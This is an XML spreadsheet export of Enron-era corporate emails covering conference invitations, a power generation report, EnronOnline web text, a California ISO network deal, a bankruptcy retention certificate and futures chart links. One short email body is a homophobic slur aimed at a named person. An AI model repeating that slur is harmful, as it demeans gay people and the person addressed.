Valley Leaders:_x000D_
_x000D_
Please join the Silicon Valley Manufacturing Group on November 16 for a_x000D_
conference on Security and Terrorism at member company Sun Microsystem's_x000D_
Santa Clara campus.  We are partnering with the Silicon Valley Biz Ink to_x000D_
host a timely conference on how Silicon Valley employers and their employees_x000D_
can adequately prepare and respond to the security and terrorism challenges_x000D_
facing our State and Nation._x000D_
_x000D_
Silicon Valley Biz Ink is handling all of the reservations and a space may_x000D_
be reserved by contacting events@svbizink.com or by calling #408/535-5642._x000D_
There is a nominal $35 fee which net profits will go toward the United Way_x000D_
Disaster Relief Fund.  The conference is limited to 400 people, so please_x000D_
respond as soon as possible.  A list of featured speakers and flyer is_x000D_
attached below for your review._x000D_
</t>
  </si>
  <si>
    <t>Wed, 1 Aug 2001 10:27:30 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeffrey.oh@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'jake.thomas@enron.com', 'jonalan.page@enron.com', 'jim.buerkle@enron.com', 'alan.comnes@enron.com', 'paul.choi@enron.com', 'houston &lt;.ward@enron.com&gt;', 'laura.wente@enron.com', 'phil.polsky@enron.com', 'tim.belden@enron.com', 'w..donovan@enron.com', 'm..driscoll@enron.com', 'jesse.bryson@enron.com', 'stewart.rosman@enron.com', 'keith.holst@enron.com', 'robert.badeer@enron.com', 'k..allen@enron.com', 'chris.mumm@enron.com', 'steve.swain@enron.com', 'f..calger@enron.com', 'michael.etringer@enron.com', 'jeff.richter@enron.com', 'jim.gilbert@enron.com', 'debra.davidson@enron.com', 'bill.williams@enron.com', 'jonathan.mckay@enron.com', 'a..gomez@enron.com', 'tom.alonso@enron.com', 'mark.fillinger@enron.com', 'julie.sarnowski@enron.com', 'mike.swerzbin@enron.com', 'g..slaughter@enron.com', 'glenn.surowiec@enron.com', 'todd.perry@enron.com', 'john.malowney@enron.com', 'chris.lackey@enron.com', 'ed.clark@enron.com', 'stephen.thome@enron.com', 'john.van@enron.com', 'diana.scholtes@enron.com', 'matt.motley@enron.com', 'sarabeth.smith@enron.com', 'david.parquet@enron.com', 'elliot.mainzer@enron.com', 'dave.fuller@enron.com', 'john.zufferli@enron.com', 'laird.dyer@enron.com', 'james.bruce@enron.com', 'jeff.shields@enron.com', 'michael.mcdonald@enron.com'})</t>
  </si>
  <si>
    <t>New Geneneration Report for July 2001</t>
  </si>
  <si>
    <t xml:space="preserve">NOTE: 	The current report has one major change . Plants that are permitted now have a 50% probability of coming_x000D_
		online rather than the previously assumed 80%._x000D_
_x000D_
In an attempt to keep this report as timely and accurate as possible, please notify me of any updated information and/or inaccuracies.  _x000D_
_x000D_
Thank you._x000D_
_x000D_
Jeffrey Oh_x000D_
Enron North America			503.464.7789_x000D_
West Power Desk				503.708.1760 (c)	_x000D_
121 SW Salmon Street 3WTC0306		503.464.3740 (fax)_x000D_
Portland, Oregon 97204			jeffrey.oh@enron.com_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 27 Sep 1999 03:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'justin.boyd@enron.com', 'kal.shah@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Re: Home Page Text: Rephrased First Paragraph</t>
  </si>
  <si>
    <t xml:space="preserve">Kal/Justin/Mark - we would like to make a minor change to the first paragra=_x000D_
ph=20_x000D_
of the_x000D_
home page text.  Could you please reply by email indicating either your=20_x000D_
approval_x000D_
or suggested changes if there are any PR or legal issues?_x000D_
_x000D_
Thanks._x000D_
_x000D_
_x000D_
Current Home Page Text (All):=20_x000D_
_x000D_
Welcome to EnronOnline, the world's first Web-_x000D_
enabled system for wholesale buying and selling_x000D_
 the full range of energy products and much more.=20_x000D_
_x000D_
EnronOnline delivers easy, free of charge access_x000D_
 to hundreds of commodity prices across the_x000D_
 globe with the click of a mouse. Click here for a=20_x000D_
preview.=20_x000D_
_x000D_
Like what you see? Apply to Register now or=20_x000D_
obtain a Guest Account and experience how=20_x000D_
EnronOnline puts the Energy into E-Commerce.=20_x000D_
_x000D_
_x000D_
Proposed New First Paragraph:_x000D_
_x000D_
Welcome to EnronOnline, the world=01,s first Web-_x000D_
based system enabling companies to buy and sell_x000D_
the full range of wholesale energy products online._x000D_
_x000D_
(the remainder of the text  remains unchanged, as above)_x000D_
 =20_x000D_
---------------------- Forwarded by Paul Goddard/LON/ECT on 27/09/99 10:44=_x000D_
=20_x000D_
---------------------------_x000D_
_x000D_
_x000D_
Louise Kitchen_x000D_
24/09/99 17:43_x000D_
To: Paul Goddard/LON/ECT@ECT_x000D_
cc: David Forster/LON/ECT@ECT, Marcello Romano/LON/ECT@ECT=20_x000D_
Subject: Re: Home Page Text: Rephrased First Paragraph =20_x000D_
_x000D_
Fine as long as the work can be done not taking anything off real workload_x000D_
_x000D_
_x000D_
_x000D_
Paul Goddard_x000D_
24/09/99 16:41_x000D_
To: Louise Kitchen/lon/ect_x000D_
cc: David Forster/LON/ECT@ECT, Marcello Romano/LON/ECT@ECT=20_x000D_
Subject: Home Page Text: Rephrased First Paragraph_x000D_
_x000D_
Louise - I ran this by Dave and Marcello and they agreed with the revised=_x000D_
=20_x000D_
version subject to your approval. Let me know if you are happy with this or=_x000D_
=20_x000D_
if you want to rephrase  it further.  I can then forward it on to legal and=_x000D_
=20_x000D_
PR for a quick email approval.   (The colour highlights below are just to=_x000D_
=20_x000D_
point out the changes for the purposes of this note).  Thanks._x000D_
_x000D_
=20_x000D_
ALTERNATIVE HOME PAGE TEXT - FIRST PARAGRAPH ONLY_x000D_
_x000D_
Old First Paragraph:_x000D_
Welcome to EnronOnline, the world=01,s first Web-_x000D_
enabled system for wholesale buying and selling the=20_x000D_
full range of energy products and much more._x000D_
_x000D_
Comments:_x000D_
1) The location of the word "wholesale"  makes this gramatically incorrect_x000D_
2) "and much more" sounds rather clich,d._x000D_
_x000D_
_x000D_
Proposed First Paragraph:_x000D_
Welcome to EnronOnline, the world=01,s first Web-_x000D_
based system enabling companies to buy and sell_x000D_
the full range of wholesale energy products online._x000D_
_x000D_
_x000D_
Advantages:_x000D_
1) Gramatically correct_x000D_
2) Explicitly reinforces that EnronOnline is for "companies" not individual=_x000D_
s=20_x000D_
who happen to surf to the Home Page and might otherwise think they can=20_x000D_
buy/sell energy themselves_x000D_
3) Extra word "online" at the end for emphasis and clarity._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 7 Nov 2000 02:41:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">As per our discussion of last Friday, I wanted to follow-up with examples of _x000D_
what_x000D_
concept I was trying to convey.  I have seen in some Enron Gas Liquids, Inc. _x000D_
physical_x000D_
confirmations that they use the following wording to incorporate the General _x000D_
Terms &amp;_x000D_
Conditions which have been sent by certified mail to the Counterparty:_x000D_
_x000D_
Enron Gas Liquids, Inc.'s Sales, Purchase and/or Exchange Agreement _x000D_
General Terms and Conditions revised October, 1998, (a copy shall be_x000D_
furnished upon Buyer's request), are incorporated herein by this reference _x000D_
for all purposes. _x000D_
_x000D_
or_x000D_
_x000D_
The following terms (also referred to as the "Special Terms and Conditions") _x000D_
and _x000D_
ELFI's General Terms and Conditions dated March 01, 1996 ("General Terms and _x000D_
Conditions"), which Buyer acknowledges it has received, together constitute _x000D_
all of _x000D_
the terms of the binding agreement between the parties regarding this _x000D_
transaction _x000D_
(this "Agreement"). _x000D_
_x000D_
I am hopeful that we might employ the same concept to the General Terms &amp; _x000D_
Conditions_x000D_
for transactions completed via EnronOnline.  The General Terms &amp; Conditions _x000D_
we _x000D_
currently attach to EOL deals is agreed to by each Counterparty online and _x000D_
the Counterparty _x000D_
can view the GTC's online, if necessary._x000D_
_x000D_
The emphasis behind the above request is, of course, and effort to reduce the _x000D_
amount of _x000D_
paper that we are faxing to Counterparties.  I cannot quantify the amount of _x000D_
fax time this would_x000D_
save, but considering that the GTC's generally double the pages faxed to a _x000D_
Counterparty, it_x000D_
am be significant.  _x000D_
_x000D_
I would be happy to discuss this further with you.  </t>
  </si>
  <si>
    <t>frozenset({'james.steffes@enron.com', 'margaret.carson@enron.com'})</t>
  </si>
  <si>
    <t>The JP Morgan report below gives further credence to the Mills/Huber thesis _x000D_
of digital-age power growth.  The in-the-trenches story is different from _x000D_
some of the academic studies by the conservation mavens._x000D_
_x000D_
- Rob_x000D_
_x000D_
_x000D_
 - jp morgan.pdf</t>
  </si>
  <si>
    <t>Mon, 21 May 2001 17:25:26 -0700 (PDT)</t>
  </si>
  <si>
    <t>LENHART, MATTHEW F,_x000D_
 _x000D_
The PEP system closes on Friday, May 25, 2001 _x000D_
 _x000D_
Our records indicate that you have been requested to provide feedback on one or more Enron employees.  The deadline for completing feedback is Friday,  May 25th.   _x000D_
 _x000D_
Below is a list of feedback requests with a status of "OPEN".  Please complete or decline these requests as soon as possible by logging into PEP at http://pep.enron.com and selecting Complete Feedback from the Main Menu. _x000D_
 _x000D_
If you have any questions, please contact the PEP Help Desk at:_x000D_
Houston:  713-853-4777, Option 4 or email: perfmgmt@enron.com_x000D_
London:  44 207 783 4040, Option 4 or email: pep.enquiries@enron.com_x000D_
 _x000D_
Thank you for your participation in this important process. _x000D_
 _x000D_
Employee Name:_x000D_
CHRISTIANSEN, SUZANNE_x000D_
LISK, DANIEL_x000D_
MACK III, HILLARY</t>
  </si>
  <si>
    <t>Thu, 31 May 2001 08:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'peter.keohane@enron.com', 'elizabeth.sager@enron.com', 'richard.sanders@enron.com'})</t>
  </si>
  <si>
    <t>Attached is the Top North America Legal Risks report.  Mark Haedicke would _x000D_
like you to update this report.  Many thanks._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Janette Elbertson_x000D_
Enron Wholesale Services_x000D_
Legal Department - EB3326_x000D_
Telephone:  (713) 853-7906_x000D_
Fax:  (713) 646-2600_x000D_
janette.elbertson@enron.com</t>
  </si>
  <si>
    <t>Wed, 12 Jan 2000 09:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Welcome to my playground</t>
  </si>
  <si>
    <t>That is if you ever get you LLC set up.  Look forward to trading with you in _x000D_
2001._x000D_
_x000D_
KR</t>
  </si>
  <si>
    <t>Mon, 16 Apr 2001 13:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Meeting Invitation for 4/18/1</t>
  </si>
  <si>
    <t xml:space="preserve">I can attend if feel it is necessary that we participate.  Just let me know._x000D_
_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
	David Parquet@ECT_x000D_
	04/16/2001 06:45 PM_x000D_
		 _x000D_
		 To: Jeff Dasovich/NA/Enron@Enron, Susan J Mara/NA/Enron@ENRON_x000D_
		 cc: _x000D_
		 Subject: Re: Meeting Invitation for 4/18/1_x000D_
_x000D_
fyi_x000D_
----- Forwarded by David Parquet/SF/ECT on 04/16/2001 04:45 PM -----_x000D_
_x000D_
	"Carolyn A Baker" &lt;cabaker@duke-energy.com&gt;_x000D_
	04/16/2001 03:45 PM_x000D_
		 _x000D_
		 To: Loretta Macktal &lt;lmacktal@cmta.net&gt;_x000D_
		 cc: david.parquet@enron.com, drothrock@cmta.net, _x000D_
john_h_stout@reliantenergy.com, jstewart@cmta.net, kgough@calpine.com, _x000D_
kmccrea@sablaw.com, tom.allen@mirant.com_x000D_
		 Subject: Re: Meeting Invitation for 4/18/1_x000D_
_x000D_
_x000D_
_x000D_
Thanks for the invitation and for putting this together.  Unfortunately I_x000D_
will be on business travel and thus unable to attend but I'll see if a_x000D_
representative is available.  I'll let you know._x000D_
Carolyn_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
                    Loretta_x000D_
                    Macktal              To:     "Allen, Tom" _x000D_
&lt;tom.allen@mirant.com&gt;, "Baker, Carolyn"_x000D_
                    &lt;lmacktal@cmt        &lt;cabaker@duke-energy.com&gt;, "Gough, _x000D_
Kassandra" &lt;kgough@calpine.com&gt;,_x000D_
                    a.net&gt;               "Parquet, David" _x000D_
&lt;david.parquet@enron.com&gt;, "Stout, John"_x000D_
                                         &lt;john_h_stout@reliantenergy.com&gt;_x000D_
                    04/16/01             cc:     "Rothrock, Dorothy" _x000D_
&lt;drothrock@cmta.net&gt;, "Stewart, Jack"_x000D_
                    03:27 PM             &lt;jstewart@cmta.net&gt;, "McCrea, Keith" _x000D_
&lt;kmccrea@sablaw.com&gt;_x000D_
                                         bcc:_x000D_
                                         Subject:     Meeting Invitation for _x000D_
4/18/1_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To:     Tom Allen, Mirant_x000D_
          Kasssandra Gough, CalPine_x000D_
          David Parquet, Enron_x000D_
          John Stout, Reliant_x000D_
          Carolyn Baker, Duke Energy_x000D_
_x000D_
From: Dorothy Rothrock, CMTA_x000D_
_x000D_
CMTA is reviewing it's policy position on wholesale market reforms and_x000D_
price caps going into the summer 2001. We would welcome and value your_x000D_
input and expertise at a meeting this week._x000D_
_x000D_
Date:  April 18, 2001_x000D_
Time:  1:00 to 2:00 pm_x000D_
Place:  CMTA Exec Conference Room, 980 Ninth Street, Sacramento_x000D_
_x000D_
You are invited to attend or send a representative.  If you can do_x000D_
neither, I would like to talk to you at a convenient time before the_x000D_
meeting._x000D_
_x000D_
Call or email Loretta at 916-441-5420 or lmacktal@cmta.net to RSVP or_x000D_
set up a time for a phone call._x000D_
_x000D_
Thanks,_x000D_
Dorothy Rothrock_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Jester _x000D_
You are a fag.</t>
  </si>
  <si>
    <t>Thu, 20 Apr 2000 05:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'dan.minter@enron.com'})</t>
  </si>
  <si>
    <t>Re: Meeting with California ISO Regarding Excess Capacity</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Jeff,_x000D_
Make sure the access to the network is defined as DS1 access...We would like _x000D_
DS3 access pricing because that is the minimum level of service we trade at _x000D_
today.  Also, please indicate that the current available capacity is about 1 _x000D_
OC3, (the current OC12 network is running about half full and the ISO wants _x000D_
about an OC3 of overhead capacity with which to scale their customers' _x000D_
demand.  We need to determine the interval between the time the ISO requests _x000D_
the upgrade to OC48 from MCI and the time that upgrade would be made _x000D_
available...California OVER estimated the number of users..._x000D_
_x000D_
Just a thought, but the ISO might be able to get MCI to reduce the Yearly fee _x000D_
they charge by waiving the right to the upgrade.  MCI would have to spend a _x000D_
significant amount of $ to do the upgrade.  Also, MCI is losing $ on those _x000D_
access loops.  If the ISO were to threaten to request 2000 loops that MCI was _x000D_
going to lose $100,000 per month on, MCI might reduce their charges if the _x000D_
ISO were to reduce the open call._x000D_
Dan Minter_x000D_
V: (503)886-0452_x000D_
F: (503)886-0441_x000D_
_x000D_
_x000D_
_x000D_
	Jeff Dasovich@EES_x000D_
	04/20/00 10:18 AM_x000D_
		 _x000D_
		 To: Dan Minter/Enron Communications@Enron Communications_x000D_
		 cc: _x000D_
		 Subject: Meeting with California ISO Regarding Excess Capacity_x000D_
_x000D_
Yo Dan:_x000D_
Could you do me a favor and take a look at my very brief summary below and _x000D_
make any changes you like.  I'd like to give folks some information as to the _x000D_
status of the ISO deal.   Appreciate it._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
---------------------- Forwarded by Jeff Dasovich/SFO/EES on 04/20/2000 10:17 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Jeff Dasovich on 04/17/2000 04:32:25 PM_x000D_
To: Dan Minter/Enron Communications@Enron Communications_x000D_
cc:  _x000D_
Subject: Meeting with California ISO Regarding Excess Capacity_x000D_
_x000D_
Dan:  Below I've provided a very brief summary of our meeting with the ISO.  _x000D_
Please review and edit in any fasion you deem appropriate then send back to _x000D_
me.  I will then distribute to a very small group (e.g., Jean Mrha, Tom Gros, _x000D_
and a couple of folks in my group who also work on EBS issues).  Thanks._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
******************************************************************************_x000D_
******************************************************************************_x000D_
**********_x000D_
We have sent the attorney representing the ISO a standard EBS NDA to review.  _x000D_
We expect to have the NDA signed within the week.  The following is a summary _x000D_
of what occured at the meeting._x000D_
_x000D_
The Network_x000D_
MCI built the system._x000D_
The ISO currently shares its private, dedicated network 50-50 with the _x000D_
California Power Exchange, though the ISO like to take control of 100% of the _x000D_
asset._x000D_
The network consists of 4 OC-12s (?) and as part of the contract, the ISO has _x000D_
a call to upgrade an no or very little cost to 4 OC-48s._x000D_
This "scalability" was built in to accommodate what California believed would _x000D_
be a very large and rapidly growing number of users (mostly scheduling _x000D_
coordinators), but California greatly underestimated the number.  So the ISO _x000D_
is left with considerable excess capacity._x000D_
It's an ATM switched network with 11 A-PoPs and 4 B-Pops and it runs from _x000D_
Folsom (Sacramento) to Alhambra (around Pasadena).  The B-PoP locations are _x000D_
Hayward, Sacramento, Long Beach, and Claremont._x000D_
_x000D_
The Contract_x000D_
The ISO pays about $30-35 million/yr under the contract---significantly above _x000D_
market._x000D_
The contract ends at the end of 2003._x000D_
The contract includes a costless, or very low cost, option to upgrade from _x000D_
OC-12 to OC-48._x000D_
The contract also permits interconnection to the network (by MCI) for $485, _x000D_
irrespective of difference from the grid._x000D_
_x000D_
The Goals of the EVP/CIO_x000D_
_x000D_
Reduce costs immediately.   Needs to take a plan designed to mitigate the _x000D_
costs to the Board in 60 days._x000D_
Wants to maintain some flexibility in the event usage grows._x000D_
"Would like to do a short term deal, for "nonfirm" service and get  a high _x000D_
price," but he would do a long-term, firm deal if it reduced his costs _x000D_
significantly._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 26 Apr 2001 00:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Voice Mail Outage 4/25-4/26</t>
  </si>
  <si>
    <t xml:space="preserve">You're welcome for my attention to this matter._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  Mark Guzman                           04/25/2001 08:47 PM_x000D_
	_x000D_
_x000D_
To: Portland West Desk_x000D_
cc:  _x000D_
_x000D_
Subject: Voice Mail Outage 4/25-4/26_x000D_
_x000D_
At approximately 6:30 pm on 4/25 Ruth Ashe with PGE notified Enron that there _x000D_
will be a voice mail outage starting the evening of 4/25 and running thru 2pm _x000D_
on 4/26.  If you have any questions or concerns please contact her at _x000D_
503-464-8663 or 503-323-1254.  Thank you for your attention to this matter.  _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 9 Mar 2001 09:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Invitation to the 20th Annual Rutgers Conference</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 03/09/2001 _x000D_
05:01 PM ---------------------------_x000D_
_x000D_
_x000D_
"Kleindorfer, Paul" &lt;kleindorfer@wharton.upenn.edu&gt; on 03/08/2001 03:41:21 PM_x000D_
To: "'vkamins@enron.com'" &lt;vkamins@enron.com&gt;_x000D_
cc: "'mcrew@andromeda.rutgers.edu'" &lt;mcrew@andromeda.rutgers.edu&gt; _x000D_
Subject: Invitation to the 20th Annual Rutgers Conference_x000D_
_x000D_
_x000D_
Vince:_x000D_
_x000D_
For two decades now, I have been a member of the faculty helping to organize _x000D_
the Eastern Conferences on Regulation and Competition that Michael Crew of _x000D_
Rutgers has chaired.  This year will be, in fact, the 20th anniversary _x000D_
conference and a number of notable personages will be joining us to celebrate _x000D_
what we have learned and what we haven't about the economics of network _x000D_
industries.  Fred Kahn, Al Philipps, Bill Hogan and a number of other _x000D_
distinguished academics will be reviewing our progress and the prospects for _x000D_
the future.  The conference will take place at a beautiful site in the _x000D_
Poconos, about 90 minutes north of Philadelphia, from Wednesday afternoon May _x000D_
24th to Friday afternoon May 26th.  You can check for yourself the nature of _x000D_
the program and the conference site/hotel at the following website URL:_x000D_
_x000D_
http://www.rci.rutgers.edu/~crri/WS.htm_x000D_
_x000D_
Michael Crew and I would both be delighted if you would be willing to be an _x000D_
after dinner speaker on Thursday evening (May 25th), just before the key _x000D_
research reviews of Friday morning take place on the electricity, telephone _x000D_
and gas industries, and following a day of special topics on emerging power _x000D_
markets and other developments in network industries.   Naturally we would be _x000D_
pleased if you would be able to stay for the entire conference, but knowing _x000D_
your schedule, you may only have time for a part of it.  That would not be a _x000D_
problem.  The usual after-dinner address is for 30 minutes, followed by a _x000D_
short Q&amp;A period._x000D_
_x000D_
Your presentation would help to underline the tremendous importance of Enron _x000D_
in driving the development of new risk instruments to assist in price _x000D_
discovery and efficient risk management for market participants, in energy _x000D_
markets and more generally.  Both Michael and I feel that your perspectives _x000D_
on the "new science of risk management" and what can be expected from it _x000D_
could be a very important addition to this special anniversay event._x000D_
_x000D_
Please let me know (and please do copy Michael on your response) whether your _x000D_
schedule will allow your participation in this very special event.  Michael _x000D_
and I would, of course, be very happy to follow up with you in discussing the _x000D_
nature of the presentation, participants and so forth, if this is a go.  I _x000D_
look forward to hearing from you._x000D_
_x000D_
Regards,_x000D_
_x000D_
Paul_x000D_
Paul Kleindorfer_x000D_
215 898-5830 _x000D_
</t>
  </si>
  <si>
    <t>Fri, 11 May 2001 10:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lisa.burnett@enron.com', 'paul.choi@enron.com', 'miguel.garcia@enron.com', 'rogers.herndon@enron.com', 'janice.moore@enron.com', 'david.porter@enron.com', 'laura.dewett@enron.com', 'kimberly.allen@enron.com', 'diana.allen@enron.com', 'alton.jackson@enron.com', 'chad.starnes@enron.com', 'genia.fitzgerald@enron.com', 'amy.clemons@enron.com', 'jeffrey.miller@enron.com', 'keith.comeaux@enron.com', 'smith.day@enron.com', 'monika.causholli@enron.com', 'rhonda.robinson@enron.com', 'dean.laurent@enron.com', 'mark.confer@enron.com', 'tom.moran@enron.com', 'jeff.richter@enron.com', 'amy.horton@enron.com', 'anna.santucci@enron.com', 'michael.driscoll@enron.com', 'laura.jones@enron.com', 'godfrey.hyde@enron.com', 'joe.quenet@enron.com', 'bert.meyers@enron.com', 'steve.hall@enron.com', 'jan.king@enron.com', 'cara.semperger@enron.com', 'steve.gim@enron.com', 'john.malowney@enron.com', 'debbie.brackett@enron.com', 'claudia.guerra@enron.com', 'billy.braddock@enron.com', 'russell.kelley@enron.com', 'mark.guzman@enron.com', 'maria.valdes@enron.com', 'joe.errigo@enron.com', 'stephanie.piwetz@enron.com', 'joseph.wagner@enron.com', 'lester.rawson@enron.com', 'robert.benson@enron.com', 'kimberly.hundl@enron.com', 'paul.thomas@enron.com', 'kerri.thompson@enron.com', 'd.hunsucker@enron.com', 'jeff.king@enron.com', 'kate.symes@enron.com', 'justin.laverell@enron.com', 'william.bradford@enron.com', 'stewart.rosman@enron.com', 'jesse.bryson@enron.com', 'karla.compean@enron.com', 'edward.baughman@enron.com', 'sharen.cason@enron.com', 'ricardo.perez@enron.com', 'tanya.rohauer@enron.com', 'marcus.nettelton@enron.com', 'chris.mallory@enron.com', 'eric.saibi@enron.com', 'doug.gilbert-smith@enron.com', 'kim.theriot@enron.com', 'shemeika.landry@enron.com', 'russell.diamond@enron.com', 'michael.kelly@enron.com', 'michael.etringer@enron.com', 'terri.clynes@enron.com', 'chris.lenartowicz@enron.com', 'janet.moore@enron.com', 'chris.dorland@enron.com', 'mike.self@enron.com', 'russell.ballato@enron.com', 'david.fairley@enron.com', 'gerald.gilbert@enron.com', 'joseph.piotrowski@enron.com', 'tom.alonso@enron.com', 'bill.rust@enron.com', 'fran.chang@enron.com', 'greg.trefz@enron.com', 'veronica.gonzalez@enron.com', 'john.forney@enron.com', 'benjamin.rogers@enron.com', 'chris.foster@enron.com', 'stanley.cocke@enron.com', 'larry.jester@enron.com', 'clint.dean@enron.com', 'david.ryan@enron.com', 'sean.crandall@enron.com', 'john.kinser@enron.com', 'don.baughman@enron.com', 'david.portz@enron.com', 'jennifer.stewart@enron.com', 'karen.lambert@enron.com', 'jon.lewis@enron.com', 'erik.serio@enron.com', 'hai.chen@enron.com', 'michael.jacobson@enron.com', 'fletcher.sturm@enron.com', 'kevin.presto@enron.com', 'leslie.hansen@enron.com', 'patrick.hanse@enron.com', 'christian.yoder@enron.com', 'tim.belden@enron.com', 'dana.davis@enron.com', 'melissa.murphy@enron.com', 'mark.fischer@enron.com', 'wendy.conwell@enron.com', 'corry.bentley@enron.com', 'stacey.white@enron.com', 'rebecca.grace@enron.com', 'andy.pace@enron.com', 'evelyn.metoyer@enron.com', 'richard.broussard@enron.com', 'andrea.dahlke@enron.com', 'rika.imai@enron.com', 'mitch.robinson@enron.com', 'rod.nelson@enron.com', 'lisa.brown@enron.com', 'kevin.cline@enron.com', 'paul.schiavone@enron.com', 'lawrence.clayton@enron.com', 'juan.padron@enron.com', 'janelle.scheuer@enron.com', 'thresa.allen@enron.com', 'kayne.coulter@enron.com', 'doug.miller@enron.com', 'casey.evans@enron.com', 'jason.choate@enron.com', 'elsie.lew@enron.com', 'gary.justice@enron.com', 'eric.smith@enron.com', 'larry.campbell@enron.com', 'todd.decook@enron.com', 'paul.sims@enron.com', 'marilyn.tisdale@enron.com', 'tom.may@enron.com', 'rudy.acevedo@enron.com', 'kim.durham@enron.com', 'paul.broderick@enron.com', 'madhup.kumar@enron.com', 'phillip.platter@enron.com', 'mike.curry@enron.com', 'keller.mayeaux@enron.com', 'steve.olinde@enron.com', 'mike.carson@enron.com', 'matt.motley@enron.com', 'vivien.pham@enron.com', 'valarie.sabo@enron.com', 'tracy.ngo@enron.com', 'christi.nicolay@enron.com', 'paul.radous@enron.com', 'melissa.ratnala@enron.com', 'robert.stalford@enron.com', 'george.diaz@enron.com', 'joy.werner@enron.com', 'doug.sewell@enron.com', 'joe.gordon@enron.com', 'clayton.vernon@enron.com', 'amy.smith@enron.com', 'george.wood@enron.com', 'holden.salisbury@enron.com', 'grace.kim@enron.com', 'gautam.gupta@enron.com', 'donald.vinson@enron.com', 'lisa.lees@enron.com', 'joe.stepenovitch@enron.com', 'robert.badeer@enron.com', 'brant.reves@enron.com', 'oscar.dalton@enron.com', 'jim.homco@enron.com', 'jason.williams@enron.com', 'john.llodra@enron.com', 'zachary.sampson@enron.com', 'lloyd.will@enron.com', 'leaf.harasin@enron.com', 'ryan.slinger@enron.com', 'gretchen.lotz@enron.com', 'elizabeth.sager@enron.com', 'larry.valderrama@enron.com', 'gwendolyn.williams@enron.com', 'alicia.nguyen@enron.com', 'edward.sacks@enron.com', 'narsimha.misra@enron.com', 'matt.lorenz@enron.com', 'holli.krebs@enron.com', 'posey.martinez@enron.com', 'sharon.fredrick@enron.com', 'mike.swerzbin@enron.com', 'tom.dutta@enron.com', 'peter.makkai@enron.com', 'bill.iii@enron.com', 'juan.hernandez@enron.com', 'geir.solberg@enron.com', 'alex.wong@enron.com', 'diana.scholtes@enron.com', 'mark.symms@enron.com', 'leslie.reeves@enron.com'})</t>
  </si>
  <si>
    <t>We have received the following EEI Master Power Purchase and Sale Agreements:_x000D_
_x000D_
BP Energy Company dated 4/27/2001_x000D_
Braintree Electric Light Department dated 5/10/01_x000D_
_x000D_
Copies will be given to legal and credit.</t>
  </si>
  <si>
    <t>Fri, 31 May 2002 06:42:32 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'executive.robert@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'mailing1.dl-ga-all_special@enron.com'})</t>
  </si>
  <si>
    <t>KERP Communication and Certificate</t>
  </si>
  <si>
    <t>The Bankruptcy Court order authorizing the Key Employee Retention, Liquidation Incentive and Severance Plan (the "KERP") requires that, before receiving any payment under the KERP, each participant certify that he or she has not engaged in insider trading of the Company's stock.  To receive any KERP payment, you must print, complete, and return the attached certificate. _x000D_
 _x000D_
If you wish to review Enron's policy regarding insider trading, you can find the Securities Trades by Company Personnel section of the Code of Ethics at: _x000D_
&lt;&lt;&lt;http://home.enron.com/resources/policies/code_of_ethics/code_of_ethics100600.pdf &gt;&gt;&gt;_x000D_
  _x000D_
To ensure that you receive your first payment, you should:_x000D_
Completely and legibly fill out the form._x000D_
Deliver it to the designated receptacle in the lobby on the 16th floor by  no later than 5:00 p.m., Monday, June 3, 2002._x000D_
Do not drop it in the mail._x000D_
_x000D_
Unfortunately, late forms will result in a delay in payment.  Thank you for your hard work and continued commitment to Enron.</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 03:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>crude &amp; product spreads and heat &amp; gas cracks as hot links 4/25</t>
  </si>
  <si>
    <t>The information contained herein is based on sources that we believe to be_x000D_
reliable, but we do not represent that it is accurate or complete.  Nothing_x000D_
contained herein should be considered as an offer to sell or a solicitation_x000D_
of an offer to buy any financial instruments discussed herein.  Any_x000D_
opinions expressed herein are solely those of the author.  As such, they_x000D_
may differ in material respects from those of, or expressed or published by_x000D_
on behalf of Carr Futures or its officers, directors, employees or_x000D_
affiliates.  , 2001 Carr Futures_x000D_
_x000D_
_x000D_
The charts are now available on the web by clicking on the hot link(s)_x000D_
contained in this email. If for any reason you are unable to receive the_x000D_
charts via the web, please contact me via email and I will email the charts_x000D_
to you as attachments._x000D_
_x000D_
Crude Spread     http://www.carrfut.com/research/Energy1/crudespread33.pdf_x000D_
Heat Spread     http://www.carrfut.com/research/Energy1/heatspread33.pdf_x000D_
Unleaded Spread_x000D_
http://www.carrfut.com/research/Energy1/unleadspread33.pdf_x000D_
_x000D_
Heat Crack     http://www.carrfut.com/research/Energy1/heatcrack33.pdf_x000D_
